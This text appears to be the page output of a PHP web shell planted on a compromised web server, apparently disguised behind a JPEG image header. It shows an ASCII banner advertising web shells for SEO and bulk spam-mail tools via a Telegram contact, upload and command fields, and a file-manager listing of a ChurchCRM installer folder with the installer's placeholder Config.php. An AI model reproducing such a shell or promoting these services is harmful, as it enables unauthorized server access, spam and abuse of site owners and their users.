����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

infinityocean@216.73.216.250: ~ $
<?php
/*******************************************************************************
 *
 *  filename    : Include/Config.php
 *  website     : https://churchcrm.io
 *  description : ChurchCRM Configuration
 *
 ******************************************************************************/

/**
 * IMPORTANT: Configuration is loaded and validated by LoadConfigs.php (line at bottom).
 *
 * If you are NOT using the setup wizard:
 * - Replace ||PLACEHOLDER|| values with your actual settings below
 * - Ensure all REQUIRED settings are present (will fail validation otherwise)
 * - Be careful with special characters in $sPASSWORD (no quotes needed, but must be exact)
 * - Test by accessing the application; errors will display on config-error.php page
 */

// ============================================================================
// DATABASE CONNECTION (REQUIRED)
// ============================================================================
// These must match your database server exactly or the application will fail

// Database server hostname or IP address
// Examples: "localhost", "127.0.0.1", "db.example.com"
$sSERVERNAME = '[[softdbhost]]';

// Database server port (standard MySQL port is 3306)
$dbPort = '';

// Database user (must have SELECT, INSERT, UPDATE, DELETE, ALTER privileges)
$sUSER = '[[softdbuser]]';

// Database password (special chars are allowed, do NOT add quotes)
$sPASSWORD = '[[softdbpass]]';

// Database name where ChurchCRM tables are located
$sDATABASE = '[[softdb]]';

// ============================================================================
// APPLICATION PATH (REQUIRED)
// ============================================================================
// Path where ChurchCRM is installed on your web server (MUST BE SET CORRECTLY)

// Examples:
// - https://www.yourdomain.com/churchcrm    → $sRootPath = '/churchcrm'
// - https://www.yourdomain.com               → $sRootPath = ''  (empty string)
// - https://crm.yourdomain.com               → $sRootPath = ''  (empty string, subdomain)
//
// Rules:
// - Start with "/" (slash) OR use empty string for root installation
// - DO NOT end with "/" (slash)
// - Case sensitive (usually lowercase)
$sRootPath = '[[relativeurl]]';

// ============================================================================
// ACCESS URLS (REQUIRED)
// ============================================================================
// URL[0] is the primary URL users will use to access ChurchCRM

// Primary URL - must include https://, domain, and path (with trailing slash)
// Examples: "https://www.mychurch.org/churchcrm/", "https://crm.mychurch.org/"
$URL[0] = '[[softurl]]/';

// Optional: Add alternate URLs for multi-domain or multi-port access
//
// IMPORTANT: Alternate URLs are only enforced when "Lock URL" is enabled in the
// admin settings (System Config). When disabled (default), any URL can access the app.
// When enabled, ONLY the URLs listed below are allowed.
//
// Use cases:
// - Allow access from both www.mychurch.org/churchcrm and crm.mychurch.org
// - Allow both http and https (not recommended for security)
// - Support non-standard port numbers (e.g., :8080)
// - Support shared SSL hosted solutions
//
// Uncomment and configure as needed. Format: https://domain/path/ (with trailing slash)
//
// Example for non-standard port:
//$URL[1] = 'https://www.mychurch.org:8080/churchcrm/';
//
// Example for alternate domain:
//$URL[2] = 'https://crm.mychurch.org/';
//
// Example for shared SSL server:
//$URL[3] = 'https://ssl.sharedsslserver.com/mychurch.org/churchcrm/';
//
// Number them sequentially starting from [1]. ChurchCRM accepts $URL[0] through $URL[5]

// ============================================================================
// ERROR REPORTING (OPTIONAL)
// ============================================================================
// Sets which PHP errors are reported
// E_ERROR = only fatal errors (recommended for production)
// See https://www.php.net/manual/en/errorfunc.constants.php for other options
error_reporting(E_ERROR);

// ============================================================================
// DO NOT MODIFY BELOW THIS LINE
// ============================================================================
// LoadConfigs.php loads and validates all settings above
require_once(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'LoadConfigs.php');

Filemanager

Name Type Size Permission Actions
images Folder 0755
php53 Folder 0755
php56 Folder 0755
php71 Folder 0755
php81 Folder 0755
php82 Folder 0755
Config.php File 4.31 KB 0644
churchcrm.sql File 46.66 KB 0644
churchcrm.zip File 34.3 MB 0644
clone.php File 3.94 KB 0644
edit.php File 4.25 KB 0644
edit.xml File 433 B 0644
fileindex.php File 1.32 KB 0644
import.php File 3.11 KB 0644
info.xml File 3.65 KB 0644
install.js File 924 B 0644
install.php File 4.57 KB 0644
install.xml File 408 B 0644
md5 File 2.75 KB 0644
notes.txt File 1.85 KB 0644